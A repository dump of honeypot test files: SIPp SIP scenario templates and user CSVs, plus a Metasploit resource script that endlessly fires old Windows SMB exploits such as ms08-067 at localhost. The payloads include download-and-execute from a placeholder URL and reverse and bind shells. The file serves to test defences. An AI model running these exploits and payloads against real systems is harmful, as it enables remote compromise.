;tag=[call_number] 28 | To: 29 | Call-ID: [call_id] 30 | CSeq: [cseq] REGISTER 31 | Contact: sip:[field0]@[local_ip]:[local_port] 32 | [field1] 33 | Max-Forwards: 10 34 | Expires: 300 35 | User-Agent: SIPp/Linux 36 | Content-Length: 0 37 | ]]> 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | ;tag=[call_number] 50 | To: 51 | Call-ID: [call_id] 52 | CSeq: [cseq] REGISTER 53 | Contact: sip:[field0]@[local_ip]:[local_port] 54 | Max-Forwards: 10 55 | Expires: 0 56 | User-Agent: SIPp/Linux 57 | Content-Length: 0 58 | ]]> 59 | 60 | 61 | 62 | 63 | 64 | 65 | ;tag=[call_number] 69 | To: 70 | Call-ID: [call_id] 71 | CSeq: [cseq] REGISTER 72 | Contact: sip:[field0]@[local_ip]:[local_port] 73 | [field1] 74 | Max-Forwards: 10 75 | Expires: 0 76 | User-Agent: SIPp/Linux 77 | Content-Length: 0 78 | ]]> 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | -------------------------------------------------------------------------------- /tests/sip/sipp/uac.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | ;tag=[pid]SIPpTag00[call_number] 31 | To: sut 32 | Call-ID: [call_id] 33 | CSeq: 1 INVITE 34 | Contact: sip:sipp@[local_ip]:[local_port] 35 | Max-Forwards: 70 36 | Subject: Performance Test 37 | Content-Type: application/sdp 38 | Content-Length: [len] 39 | 40 | v=0 41 | o=user1 53655765 2353687637 IN IP[local_ip_type] [local_ip] 42 | s=- 43 | c=IN IP[media_ip_type] [media_ip] 44 | t=0 0 45 | m=audio [media_port] RTP/AVP 0 46 | a=rtpmap:0 PCMU/8000 47 | 48 | ]]> 49 | 50 | 51 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | ;tag=[pid]SIPpTag00[call_number] 75 | To: sut [peer_tag_param] 76 | Call-ID: [call_id] 77 | CSeq: 1 ACK 78 | Contact: sip:sipp@[local_ip]:[local_port] 79 | Max-Forwards: 70 80 | Subject: Performance Test 81 | Content-Length: 0 82 | 83 | ]]> 84 | 85 | 86 | 87 | 
88 | 89 | 90 | 91 | 92 | ;tag=[pid]SIPpTag00[call_number] 97 | To: sut [peer_tag_param] 98 | Call-ID: [call_id] 99 | CSeq: 2 BYE 100 | Contact: sip:sipp@[local_ip]:[local_port] 101 | Max-Forwards: 70 102 | Subject: Performance Test 103 | Content-Length: 0 104 | 105 | ]]> 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | -------------------------------------------------------------------------------- /tests/sip/sipp/user.csv: -------------------------------------------------------------------------------- 1 | SEQUENTIAL 2 | 100 3 | -------------------------------------------------------------------------------- /tests/sip/sipp/user_pw.csv: -------------------------------------------------------------------------------- 1 | SEQUENTIAL 2 | pw100;[authentication username=pw100 password=password] 3 | -------------------------------------------------------------------------------- /tests/smb/metasploit.rc: --------------------------------------------------------------------------------
version


sleep(1)

# Payload catalogue. Each exploit below names which of these it may be
# paired with through its 'shellcode' => { 'allow' => [...] } patterns.
shellcodes = {
  'download:exec' => {
    'payload' => 'windows/download_exec',
    'options' => {
      # NOTE(review): placeholder URL; presumably the honeypot under test
      # will try to fetch it, so keep it non-resolving or under your control.
      'URL' => 'http://foobar.de/test.exe'
    }
  },
  'shell:reverse' => {
    'payload' => 'windows/shell/reverse_tcp',
    'options' => {
      'LHOST' => '127.0.0.1',
      'LPORT' => 4445
    }
  },

  'shell:bind' => {
    'payload' => 'windows/shell/bind_tcp',
    'options' => {
      'LPORT' => 4444
    }
  },

  'exec' => {
    'payload' => 'windows/exec',
    'options' => {
      'CMD' => 'echo foo'
    }
  }

}

# Modules to run against the local listener (RHOST is fixed to 127.0.0.1
# below). 'options' are extra module settings; 'shellcode' restricts the
# payload catalogue via regex 'allow' (and optional 'deny') patterns.
exploits = {
  'ms03-049' => {
    'exploit' => 'exploit/windows/smb/ms03_049_netapi',
    'shellcode' => {
      'allow' => ['download:exec']
    }
  },

  'ms04-007' => {
    'exploit' => 'exploit/windows/smb/ms04_007_killbill',
    'shellcode' => {
      'allow' => ['download:exec']
    }
  },

  'ms04-011' => {
    'exploit' => 'exploit/windows/smb/ms04_011_lsass',
    'shellcode' => {
      'allow' => ['download:exec']
    }
  },

  'ms04-031' => {
    'exploit' => 'exploit/windows/smb/ms04_031_netdde',
    'shellcode' => {
      'allow' => ['download:exec']
    }
  },

  'ms05-039' => {
    'exploit' => 'exploit/windows/smb/ms05_039_pnp',
    'shellcode' => {
      'allow' => ['download:exec']
    }
  },

  # 'ms06-025' => {
  #   'exploit' => ['exploit/windows/smb/ms06_025_rasmans_reg','exploit/windows/smb/ms06_025_rasmans_rras']
  # },

  'ms06-040' => {
    'exploit' => 'exploit/windows/smb/ms06_040_netapi',
    'shellcode' => {
      'allow' => ['download:exec']
    }
  },

  # 'ms06-066' => {
  #   'exploit' => ['exploit/windows/smb/ms06_066_nwapi','exploit/windows/smb/ms06_066_nwwks'],
  # },

  'ms06-070' => {
    'exploit' => 'exploit/windows/smb/ms06_070_wkssvc',
    'shellcode' => {
      'allow' => ['download:exec']
    }
  },

  'ms07-029' => {
    'exploit' => 'exploit/windows/smb/ms07_029_msdns_zonename',
    'shellcode' => {
      'allow' => ['download:exec']
    }
  },

  'ms08-067' => {
    'exploit' => 'exploit/windows/smb/ms08_067_netapi',
    'shellcode' => {
      'allow' => ['download:exec']
    }
  },

  'ms09-050' => {
    'exploit' => 'exploit/windows/smb/ms09_050_smb2_negotiate_func_index',
    'options' => {
      'WAIT' => 2
    },
    'shellcode' => {
      'allow' => ['download:exec']
    }
  },

  'ms10-061' => {
    'exploit' => 'exploit/windows/smb/ms10_061_spoolss',
    'options' => {
      'PNAME' => 'XPSPrinter'
    }
  }
}

# Runs forever, cycling through every exploit/payload pairing; stop it
# from the console when enough traffic has been generated.
loop do
  exploits.each do |name, spec|

    print_status("Running #{name}")
    run_single("use #{spec['exploit']}")
    run_single("set RHOST 127.0.0.1")

    if spec.key?('options')
      spec['options'].each do |key, value|
        run_single("set #{key} #{value}")
      end
    end

    # Without a 'shellcode' section every payload is allowed; with one,
    # a payload must match an 'allow' pattern and no 'deny' pattern.
    open_to_all = !spec.key?('shellcode')
    allow = open_to_all ? [] : spec['shellcode']['allow']

    shellcodes.each do |sc_name, sc|
      allowed = open_to_all
      allow.each do |pattern|
        next unless sc_name.match(/#{pattern}/)
        allowed = true
        if spec['shellcode'].key?('deny')
          spec['shellcode']['deny'].each do |d|
            # print_status("deny #{sc_name} #{d}")
            if sc_name.match(/#{d}/)
              allowed = false
              break
            end
          end
        end
        break
      end
      next unless allowed

      run_single("set PAYLOAD #{sc['payload']}")
      sc['options'].each do |key, value|
        run_single("set #{key} #{value}")
      end
      sleep(1)
      print_status("Exploit #{name} Payload #{sc['payload']}")
      run_single("exploit")
    end
  end

end

--------------------------------------------------------------------------------